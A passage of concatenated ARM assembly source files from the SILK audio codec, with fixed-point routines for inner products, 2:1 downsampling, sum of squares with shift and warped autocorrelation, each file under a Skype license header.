L(6)/*Len4R2Odd:*/
sub len, len, #4
ldrsh tmp, [val_p2], #2 /*make val_p2 even*/
ldmia val_p1!, {val1, val3}
ldmia val_p2!, {val2, val4}
mov tmp, tmp, lsl #16
L(0)
subs len, len, #4
smlabt sum, val1, tmp, sum
smlatb sum, val1, val2, sum
smlabt sum, val3, val2, sum
smlatb sum, val3, val4, sum
mov tmp, val4
ldmia val_p1!, {val1, val3}
ldmia val_p2!, {val2, val4}
bgt LR(0, b)
smlabt sum, val1, tmp, sum
smlatb sum, val1, val2, sum
smlabt sum, val3, val2, sum
smlatb sum, val3, val4, sum
ldmia sp!, {r4-r10, fp, ip, pc}
L(1)/*R1Odd:*/
ands val2, val_p2, #2 /*Check if val_p2 is LR(4, B) aligned*/
bgt LR(3, f)/*R1R2Odd*/
ands tmp, len, #3
beq LR(5, f)/*Len4R1Odd*/
ldrsh val1, [val_p1], #2
ldrsh val2, [val_p1], #2
ldr val3, [val_p2], #4 /*make val_p2 even*/
sub len, len, #2
smlabb sum, val1, val3, sum
smlabt sum, val2, val3, sum
L(5)/*Len4R1Odd:*/
sub len, len, #4
ldrsh tmp, [val_p1], #2 /*make val_p2 even*/
ldmia val_p1!, {val1, val3}
ldmia val_p2!, {val2, val4}
mov tmp, tmp, lsl #16
L(0)
subs len, len, #4
smlatb sum, tmp, val2, sum
smlabt sum, val1, val2, sum
smlatb sum, val1, val4, sum
smlabt sum, val3, val4, sum
mov tmp, val3
ldmia val_p1!, {val1, val3}
ldmia val_p2!, {val2, val4}
bgt LR(0, b)
smlatb sum, tmp, val2, sum
smlabt sum, val1, val2, sum
smlatb sum, val1, val4, sum
smlabt sum, val3, val4, sum
ldmia sp!, {r4-r10, fp, ip, pc}
L(3)/*R1R2Odd:*/
sub len, len, #4
ldrsh val3, [val_p1], #2
ldrsh val4, [val_p2], #2
ldr val1, [val_p1], #4
ldr val2, [val_p2], #4
smlabb sum, val3, val4, sum
L(0)
subs len, len, #2
SKP_SMLAD sum, val1, val2, sum
ldr val1, [val_p1], #4
ldr val2, [val_p2], #4
bgt LR(0, b)
ldrsh val3, [val_p1], #2
ldrsh val4, [val_p2], #2
SKP_SMLAD sum, val1, val2, sum
smlabb sum, val3, val4, sum
ldmia sp!, {r4-r10, fp, ip, pc}
L(9)/*LenLessThan14:*/
mov len, r2
mov val_p2, r0
mov sum, #0
L(0)
ldrsh val1, [val_p1], #2
ldrsh val2, [val_p2], #2
subs len, len, #1
smlabb sum, val1, val2, sum
bgt LR(0, b)
ldmia sp!, {r4-r10, fp, ip, pc}
/*
* SKP_Silk_inner_prod16_aligned_64(val1_16bit[], val2_16bit[], len)
*
* Known issue:
* 1. val1_16bit and val2_16bit needs to be 16bit aligned.
* 2. result is in 64bit.
*/
// only redefine those registers.
VARDEF sumLo, r0
VARDEF sumHi, r1
#ifdef IPHONE
VARDEF val_p3, sl
VARDEF val_5, sb
VARDEF val_6, _r7
VARDEF val_7, lr
VARDEF val_8, ip
#else
VARDEF val_p3, sb
VARDEF val_5, r8
VARDEF val_6, sl
VARDEF val_7, lr
VARDEF val_8, ip
#endif
.globl SYM(SKP_Silk_inner_prod16_aligned_64)
SYM(SKP_Silk_inner_prod16_aligned_64):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
cmp r2, #14
blt LR(9, f)/*LenLessThan14_64*/
ands tmp, r2, #1 /*check if len is a even number*/
mov len, r2
mov val_p2, r0
mov val_p3, r1
mov sumLo, #0
mov sumHi, #0
beq LR(0, f)/*LenEven64*/
ldrsh val3, [val_p3], #2
ldrsh val4, [val_p2], #2
sub len, len, #1
smlalbb sumLo, sumHi, val3, val4
L(0)/*LenEven64:*/
ands val1, val_p3, #2 /*Check if val_p3 is LR(4, B) aligned.*/
bgt LR(1, f)/*R1Odd64*/
ands val2, val_p2, #2 /*Check if val_p2 is LR(4, B) aligned*/
bgt LR(2, f)/*R2Odd64*/
/*R1R2Even64:*/
ands tmp, len, #3
beq LR(4, f)/*Len464*/
sub len, len, #2
ldr val1, [val_p3], #4
ldr val2, [val_p2], #4
SKP_SMLALD sumLo, sumHi, val1, val2
L(4)/*Len464:*/
ands tmp, len, #7
beq LR(8, f)/*Len864*/
sub len, len, #4
ldmia val_p3!, {val1, val3}
ldmia val_p2!, {val2, val4}
SKP_SMLALD sumLo, sumHi, val1, val2
SKP_SMLALD sumLo, sumHi, val3, val4
L(8)/*Len864:*/
ldmia val_p3!, {val1, val3, val_5, val_7}
ldmia val_p2!, {val2, val4, val_6, val_8}
L(0)
subs len, len, #8
SKP_SMLALD sumLo, sumHi, val1, val2
SKP_SMLALD sumLo, sumHi, val3, val4
SKP_SMLALD sumLo, sumHi, val_5, val_6
SKP_SMLALD sumLo, sumHi, val_7, val_8
ldmgtia val_p3!, {val1, val3, val_5, val_7}
ldmgtia val_p2!, {val2, val4, val_6, val_8}
bgt LR(0, b)
ldmia sp!, {r4-r10, fp, ip, pc}
L(2)/*R2Odd64:*/
sub len, len, #2
sub val_p2, val_p2, #2 /*make val_p2 even*/
ldr val1, [val_p3], #4
ldr val3, [val_p2], #4
ldr val2, [val_p2], #4
L(0)
subs len, len, #2
smlalbt sumLo, sumHi, val1, val3
smlaltb sumLo, sumHi, val1, val2
mov val3, val2
ldr val1, [val_p3], #4
ldr val2, [val_p2], #4
bgt LR(0, b)
smlalbt sumLo, sumHi, val1, val3
smlaltb sumLo, sumHi, val1, val2
ldmia sp!, {r4-r10, fp, ip, pc}
L(1)/*R1Odd64:*/
ands val2, r2, #2 /*Check if val_p2 is LR(4, B) aligned*/
bgt LR(3, f)/*R1R2Odd64*/
sub len, len, #2
sub val_p3, val_p3, #2 /*make val_p3 even*/
ldr val3, [val_p3], #4
ldr val1, [val_p3], #4
ldr val2, [val_p2], #4
L(0)
subs len, len, #2
smlaltb sumLo, sumHi, val3, val2
smlalbt sumLo, sumHi, val1, val2
mov val3, val1
ldr val1, [val_p3], #4
ldr val2, [val_p2], #4
bgt LR(0, b)
smlaltb sumLo, sumHi, val3, val2
smlalbt sumLo, sumHi, val1, val2
ldmia sp!, {r4-r10, fp, ip, pc}
L(3)/*R1R2Odd64:*/
sub len, len, #4
ldrsh val3, [val_p3], #2
ldrsh val4, [val_p2], #2
ldr val1, [val_p3], #4
ldr val2, [val_p2], #4
smlalbb sumLo, sumHi, val3, val4
L(0)
subs len, len, #2
SKP_SMLALD sumLo, sumHi, val1, val2
ldr val1, [val_p3], #4
ldr val2, [val_p2], #4
bgt LR(0, b)
ldrsh val3, [val_p3], #2
ldrsh val4, [val_p2], #2
SKP_SMLALD sumLo, sumHi, val1, val2
smlalbb sumLo, sumHi, val3, val4
ldmia sp!, {r4-r10, fp, ip, pc}
L(9)/*LenLessThan14_64:*/
mov len, r2
mov val_p2, r0
mov val_p3, r1
mov sumLo, #0
mov sumHi, #0
L(0)
ldrsh val1, [val_p3], #2
ldrsh val2, [val_p2], #2
subs len, len, #1
smlalbb sumLo, sumHi, val1, val2
bgt LR(0, b)
ldmia sp!, {r4-r10, fp, ip, pc}
#endif
END
#endif
|
open-vela/external_silk-v3-decoder | 3,460 | silk/src/SKP_Silk_resampler_down2_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=5
/* Allpass coefficients of the 2:1 decimator, Q15 each.
 * 0x9B81 is negative when interpreted as a signed 16-bit value. */
#define SKP_Silk_resampler_down2_0 0x2690
#define SKP_Silk_resampler_down2_1 0x9B81
/* Register aliases (VARDEF comes from SKP_Silk_AsmPreproc.h). */
VARDEF xy0, r4
VARDEF xy1, r5
VARDEF down2_coefs, _r7
VARDEF S_0, r6
VARDEF S_1, r8
VARDEF in0, sb
VARDEF in1, sl
VARDEF out32, r0
.set sp_S, 0
/*
 * SKP_Silk_resampler_down2 -- downsample a 16-bit signal by a factor of 2
 * using two first-order allpass branches whose outputs are summed.
 * In:  r0 = S      state vector, two SKP_int32 (loaded here, written back)
 *      r1 = out    output buffer, one SKP_int16 per input pair
 *      r2 = in     input buffer, SKP_int16
 *      r3 = inLen  number of input samples (halved below: 1 output / 2 inputs)
 * NOTE(review): argument roles inferred from the register usage below --
 * confirm against the C declaration of SKP_Silk_resampler_down2.
 */
.globl SYM(SKP_Silk_resampler_down2)
SYM(SKP_Silk_resampler_down2):
stmdb sp!, {r4-r10, fp, ip, lr} // save callee-saved regs
add fp, sp, #36
sub sp, sp, #4 // one local slot: saved state pointer
ldrsh in0, [r2], #2 // Avoid un-aligned access
ldrsh in1, [r2], #2
str r0, [sp, #sp_S] // keep &S for the write-back at exit
ldmia r0, {S_0, S_1} // load the two allpass states
/* Build down2_coefs = 0x26909B81: coef_0 (0x2690) in the top halfword for
 * smulwt, coef_1 (0x9B81) in the bottom halfword for smlawb. */
mov down2_coefs, #0x26000000
add down2_coefs, down2_coefs, #0x900000
add down2_coefs, down2_coefs, #0x9B00
add down2_coefs, down2_coefs, #0x81
mov r3, r3, asr #1 // loop count = inLen / 2
mov ip, #1024 // rounding offset for the final >> 11
L(0)
add out32, S_0, S_1 // out = S[0] + S[1]
rsb xy0, S_0, in0, lsl #10 // Y0 = (in0 << 10) - S[0]
rsb xy1, S_1, in1, lsl #10 // Y1 = (in1 << 10) - S[1]
smlawb xy0, xy0, down2_coefs, xy0 // X0 = Y0 + ((Y0 * coef_1) >> 16)
smulwt xy1, xy1, down2_coefs // X1 = (Y1 * coef_0) >> 16
add out32, out32, xy0
add S_0, xy0, in0, lsl #10 // S[0] = X0 + (in0 << 10)
add out32, out32, xy1
add S_1, xy1, in1, lsl #10 // S[1] = X1 + (in1 << 10)
#if EMBEDDED_ARM>=6
qadd out32, out32, ip // saturating +1024 (rounding)
subs r3, r3, #1
ssat out32, #16, out32, asr #11 // >> 11 and saturate to int16 range
#ifdef _WINRT
ble LR(1, f) // _WINRT build avoids conditionally executed loads
ldrsh in0, [r2], #2
ldrsh in1, [r2], #2
L(1)
#else
ldrgtsh in0, [r2], #2 // preload the next pair while samples remain
ldrgtsh in1, [r2], #2
#endif
#else
qadd out32, out32, ip // saturating +1024 (rounding)
/* Pre-ARMv6: clamp to [-2^26, 2^26 - 1] so that >> 11 lands in int16 range
 * (manual equivalent of the ssat above). */
cmp out32, #0x4000000
movge out32, #0x4000000
subge out32, out32, #1
cmn out32, #0x4000000
movlt out32, #0x4000000
subs r3, r3, #1
mov out32, out32, asr #11
ldrgtsh in0, [r2], #2 // preload the next pair while samples remain
ldrgtsh in1, [r2], #2
#endif
strh out32, [r1], #2 // emit one decimated sample
bgt LR(0, b)
ldr r0, [sp, #sp_S]
stmia r0, {S_0, S_1} // write the updated state back
add sp, sp, #4
ldmia sp!, {r4-r10, fp, ip, pc} // restore and return
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 3,431 | silk/src/SKP_Silk_sum_sqr_shift_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=5
VARDEF x0, r4
VARDEF nrg_tmp, r5
VARDEF shift, r6
VARDEF nrg, _r7
VARDEF idx, r8
/*
 * SKP_Silk_sum_sqr_shift -- energy of an int16 vector, together with a
 * right-shift chosen on the fly so the accumulated sum of squares stays a
 * non-negative int32.
 * In:  r0 = &energy  (SKP_int32 out)
 *      r1 = &shift   (SKP_int   out: the shift already applied to energy)
 *      r2 = x        input vector, SKP_int16
 *      r3 = len      number of samples
 * NOTE(review): roles inferred from the loads/stores below -- confirm against
 * the C declaration of SKP_Silk_sum_sqr_shift.
 */
.globl SYM(SKP_Silk_sum_sqr_shift)
SYM(SKP_Silk_sum_sqr_shift):
stmdb sp!, {r4-r8, fp, ip, lr}
add fp, sp, #28
mov idx, r3
ands nrg_tmp, r2, #2 // is x halfword- but not word-aligned?
mov nrg, #0
#ifdef _WINRT
beq LR(6, f)
ldrh x0, [r2], #2 // consume one sample so word loads below are aligned
smulbb nrg, x0, x0
sub idx, idx, #1
L(6)
#else
ldrneh x0, [r2], #2 // consume one sample so word loads below are aligned
smulbbne nrg, x0, x0
subne idx, idx, #1
#endif
ldr r4, [r2], #4 // x0 := two packed 16-bit samples per word load
mov shift, #0
sub idx, idx, #1
/* Fast path: accumulate unscaled until bit 31 of nrg gets set. */
L(0)
subs idx, idx, #2
SKP_SMLAD nrg, x0, x0, nrg // nrg += x[i]^2 + x[i+1]^2 (dual 16-bit MAC)
#ifdef _WINRT
ldrgt x0, [r2]
addgt r2, r2, #4
#else
ldrgt x0, [r2], #4
#endif
cmp nrg, #0 // negative => overflow guard tripped
blt LR(1, f)
cmp idx, #0
bgt LR(0, b)
beq LR(4, f) // exactly one tail sample left
b LR(5, f)
L(1)
/* Scaled path: shift the accumulator down and keep growing the shift
 * whenever bit 31 gets set again. */
mov nrg, nrg, lsr #2
mov shift, #2
cmp idx, #0
beq LR(4, f)
blt LR(5, f)
L(3)
subs idx, idx, #2
SKP_SMUAD nrg_tmp, x0, x0 // unscaled energy of the sample pair
#ifdef _WINRT
ldrgt x0, [r2]
addgt r2, r2, #4
mov nrg_tmp, nrg_tmp, lsr shift
adds nrg, nrg, nrg_tmp
#else
ldrgt x0, [r2], #4
add nrg, nrg, nrg_tmp, lsr shift // accumulate at the current scale
cmp nrg, #0
#endif
movlt nrg, nrg, lsr #2 // still overflowing: scale down further
addlt shift, shift, #2
cmp idx, #0
bgt LR(3, b)
blt LR(5, f)
L(4)
/* Tail: one remaining sample (odd effective count). */
ldrh x0, [r2]
smulbb nrg_tmp, x0, x0
#ifdef _WINRT
mov nrg_tmp, nrg_tmp, lsr shift
add nrg, nrg, nrg_tmp
#else
add nrg, nrg, nrg_tmp, lsr shift
#endif
L(5)
/* Keep headroom for the caller: clear the top two bits if set. */
ands nrg_tmp, nrg, #0xC0000000
movne nrg, nrg, lsr #2
addne shift, shift, #2
str shift, [r1]
str nrg, [r0]
ldmia sp!, {r4-r8, fp, ip, pc}
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 7,104 | silk/src/SKP_Silk_warped_autocorrelation_FIX_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
/* Fixed-point formats: QC for the correlation output, QS for the state. */
#define QC 10
#define QS 14
#include "SKP_Silk_AsmPreproc.h"
#if ( EMBEDDED_ARM >= 6 )
VARDEF tmp1_QS, r4
VARDEF length, r5
VARDEF state_QS_ptr, r6
VARDEF val_i, _r7
VARDEF tmp3, r8
VARDEF tmp4, sb
VARDEF corr_QC_ptr, sl
VARDEF state_QS1, ip
VARDEF state_QS2, lr
VARDEF ret0, r0
VARDEF ret1, r1
VARDEF state_QS0, r2
VARDEF warping_Q16, r3
/* Local frame layout (216 bytes):
 *   sp+0    state_QS[17]  warped filter state, Q14
 *   sp+68   corr_QC[17]   64-bit accumulators ({lo, hi} pairs)
 *   sp+204  saved corr output pointer
 *   sp+208  saved scale output pointer
 *   sp+212  saved input pointer */
.set sp_state_QS, 0
.set sp_corr_QS, 68
.set sp_corr_ptr, 204
.set sp_scale_ptr, 208
.set sp_input_ptr, 212
/*
 * SKP_Silk_warped_autocorrelation_FIX -- warped autocorrelation, fixed point,
 * accumulating each lag in 64 bits and scaling the result to int32 at the end.
 * In:  r0 = corr (out), r1 = scale (out), r2 = input (SKP_int16),
 *      r3 = warping_Q16. The 5th/6th C arguments (length, order) are read
 *      from the caller's stack: sp+256 / sp+260 = 216 locals + 40 saved regs.
 * NOTE(review): argument roles inferred from the code below -- confirm against
 * the C declaration of SKP_Silk_warped_autocorrelation_FIX.
 */
.globl SYM(SKP_Silk_warped_autocorrelation_FIX)
SYM(SKP_Silk_warped_autocorrelation_FIX):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
sub sp, sp, #216
/* Stack-argument offsets, relative to the post-prologue sp. */
.set ptr_length, 256
.set ptr_order, 260
.set ptr_tmp1_QS, 264
.set ptr_state_QS, 268
.set ptr_corr_QC, 272
str r0, [sp, #sp_corr_ptr]
str r1, [sp, #sp_scale_ptr]
add state_QS_ptr, sp, #sp_state_QS
add corr_QC_ptr, sp, #sp_corr_QS
/* Zero state_QS[0..16] and the 17 64-bit corr_QC accumulators. */
mov r4, #0
mov r5, #0
mov _r7, #17
L(2)
subs _r7, _r7, #1
str r4, [state_QS_ptr], #4
stmia corr_QC_ptr!, {r4, r5}
bgt LR(2, b)
ldr length, [sp, #ptr_length]
/*OUTTER_LOOP*/ // one iteration per input sample
L(1)
ldrsh tmp1_QS, [r2], #2
add state_QS_ptr, sp, #sp_state_QS
add corr_QC_ptr, sp, #sp_corr_QS
ldr val_i, [sp, #ptr_order]
str r2, [sp, #sp_input_ptr] // input pointer spilled; r2 reused below
mov tmp1_QS, tmp1_QS, lsl #14 // current sample in QS (Q14)
sub val_i, val_i, #2
ldr state_QS1, [state_QS_ptr], #4
ldr state_QS2, [state_QS_ptr], #4
str tmp1_QS, [state_QS_ptr, #-8]
sub ret0, state_QS2, tmp1_QS
mov state_QS0, tmp1_QS // state_QS[0], one factor of every product
/* corr_QC[lag] += (tmp1_QS * state_QS0) >> (2*QS - QC), accumulated as a
 * 64-bit {lo, hi} pair: lo = (lo32 >> 18) | (hi32 << 14), hi = hi32 >> 18. */
smull tmp3, tmp4, tmp1_QS, state_QS0
smlawb tmp1_QS, ret0, warping_Q16, state_QS1 // warped state update (lag 1)
ldmia corr_QC_ptr, {ret0, ret1}
mov tmp3, tmp3, lsr #18
orr tmp3, tmp3, tmp4, lsl #14
adds ret0, ret0, tmp3
adc ret1, ret1, tmp4, asr #18
stmia corr_QC_ptr!, {ret0, ret1}
ldr state_QS1, [state_QS_ptr], #4
str tmp1_QS, [state_QS_ptr, #-8]
sub ret0, state_QS1, tmp1_QS
smull tmp3, tmp4, tmp1_QS, state_QS0
smlawb tmp1_QS, ret0, warping_Q16, state_QS2 // warped state update (lag 2)
ldmia corr_QC_ptr, {ret0, ret1}
mov tmp3, tmp3, lsr #18
orr tmp3, tmp3, tmp4, lsl #14
adds ret0, ret0, tmp3
adc ret1, ret1, tmp4, asr #18
stmia corr_QC_ptr!, {ret0, ret1}
/*INNER_LOOP*/ // two lags per iteration, same accumulate pattern as above
L(0)
ldr state_QS2, [state_QS_ptr], #4
str tmp1_QS, [state_QS_ptr, #-8]
smull tmp3, tmp4, tmp1_QS, state_QS0
ldmia corr_QC_ptr, {ret0, ret1}
sub tmp1_QS, state_QS2, tmp1_QS
smlawb tmp1_QS, tmp1_QS, warping_Q16, state_QS1
mov tmp3, tmp3, lsr #18
orr tmp3, tmp3, tmp4, lsl #14
ldr state_QS1, [state_QS_ptr], #4
str tmp1_QS, [state_QS_ptr, #-8]
adds ret0, ret0, tmp3
adc ret1, ret1, tmp4, asr #18
stmia corr_QC_ptr!, {ret0, ret1}
smull tmp3, tmp4, tmp1_QS, state_QS0
ldmia corr_QC_ptr, {ret0, ret1}
sub tmp1_QS, state_QS1, tmp1_QS
smlawb tmp1_QS, tmp1_QS, warping_Q16, state_QS2
mov tmp3, tmp3, lsr #18
orr tmp3, tmp3, tmp4, lsl #14
adds ret0, ret0, tmp3
adc ret1, ret1, tmp4, asr #18
subs val_i, val_i, #2
stmia corr_QC_ptr!, {ret0, ret1}
bgt LR(0, b)
/* Last lag for this sample, then restore the input pointer. */
str tmp1_QS, [state_QS_ptr, #-4]
smull tmp3, tmp4, tmp1_QS, state_QS0
ldmia corr_QC_ptr, {ret0, ret1}
ldr r2, [sp, #sp_input_ptr]
mov tmp3, tmp3, lsr #18
orr tmp3, tmp3, tmp4, lsl #14
adds ret0, ret0, tmp3
adc ret1, ret1, tmp4, asr #18
subs length, length, #1
stmia corr_QC_ptr!, {ret0, ret1}
bgt LR(1, b)
/* All samples processed: derive a common scale from corr_QC[0]'s headroom
 * and emit the int32 correlations. */
ldr r4, [sp, #sp_corr_ptr]
ldr state_QS_ptr, [sp, #sp_scale_ptr] // register reused as the scale pointer
add corr_QC_ptr, sp, #sp_corr_QS
ldr val_i, [sp, #ptr_order]
ldmia corr_QC_ptr!, {state_QS1, state_QS2} // corr_QC[0] {lo, hi}
cmp state_QS2, #0
clz tmp3, state_QS1
clz tmp4, state_QS2
#ifdef _WINRT
bne LR(6, f)
add tmp4, tmp3, #32 // hi word empty: count the lo word's headroom too
L(6)
#else
addeq tmp4, tmp3, #32 // hi word empty: count the lo word's headroom too
#endif
sub tmp4, tmp4, #35
/* Clamp the shift to [-22, 20]. */
cmn tmp4, #22
#ifdef _WINRT
bge LR(6, f)
mov tmp4, #-22
L(6)
cmp tmp4, #20
ble LR(6, f)
mov tmp4, #20
L(6)
#else
movlt tmp4, #-22
cmp tmp4, #20
movgt tmp4, #20
#endif
add tmp3, tmp4, #10
rsb tmp3, tmp3, #0
str tmp3, [state_QS_ptr] // *scale = -(shift + QC)
cmp tmp4, #0
bge LR(3, f)
/* Negative shift: 64-bit right shift of each accumulator, two per pass. */
rsb tmp4, tmp4, #0
rsb tmp3, tmp4, #32 // complementary shift for the cross terms
mov state_QS2, state_QS2, lsl tmp3
mov state_QS1, state_QS1, lsr tmp4
orr state_QS1, state_QS1, state_QS2
ldmia corr_QC_ptr!, {r0, r1, r2, r3}
str state_QS1, [r4], #4
L(4)
subs val_i, val_i, #2
mov r0, r0, lsr tmp4
#ifdef _WINRT
mov state_QS1, r1, lsl tmp3
orr state_QS1, r0, state_QS1
#else
orr state_QS1, r0, r1, lsl tmp3
#endif
mov r2, r2, lsr tmp4
#ifdef _WINRT
mov state_QS2, r3, lsl tmp3
orr state_QS2, r2, state_QS2
#else
orr state_QS2, r2, r3, lsl tmp3
#endif
#ifdef _WINRT
ble LR(6, f)
ldmia corr_QC_ptr!, {r0, r1, r2, r3}
stmia r4!, {state_QS1, state_QS2}
b LR(4, b)
L(6)
stmia r4!, {state_QS1, state_QS2}
#else
ldmgtia corr_QC_ptr!, {r0, r1, r2, r3}
stmia r4!, {state_QS1, state_QS2}
bgt LR(4, b)
#endif
add sp, sp, #216
ldmia sp!, {r4-r10, fp, ip, pc}
L(3)
/* Non-negative shift: left shift of each accumulator's low word. */
mov state_QS1, state_QS1, lsl tmp4
ldr r1, [corr_QC_ptr], #8
ldr r3, [corr_QC_ptr], #8
str state_QS1, [r4], #4
L(5)
subs val_i, val_i, #2
mov r0, r1, lsl tmp4
mov r2, r3, lsl tmp4
#ifdef _WINRT
ble LR(6, f)
ldr r1, [corr_QC_ptr], #8
ldr r3, [corr_QC_ptr], #8
stmia r4!, {r0, r2}
b LR(5, b)
L(6)
stmia r4!, {r0, r2}
#else
ldrgt r1, [corr_QC_ptr], #8
ldrgt r3, [corr_QC_ptr], #8
stmia r4!, {r0, r2}
bgt LR(5, b)
#endif
add sp, sp, #216
ldmia sp!, {r4-r10, fp, ip, pc}
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 2,966 | silk/src/SKP_Silk_sigm_Q15_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=4
VARDEF ptr_slope, r6
VARDEF ptr_LUT, _r7
VARDEF in_Q5, r1
VARDEF ind, r2
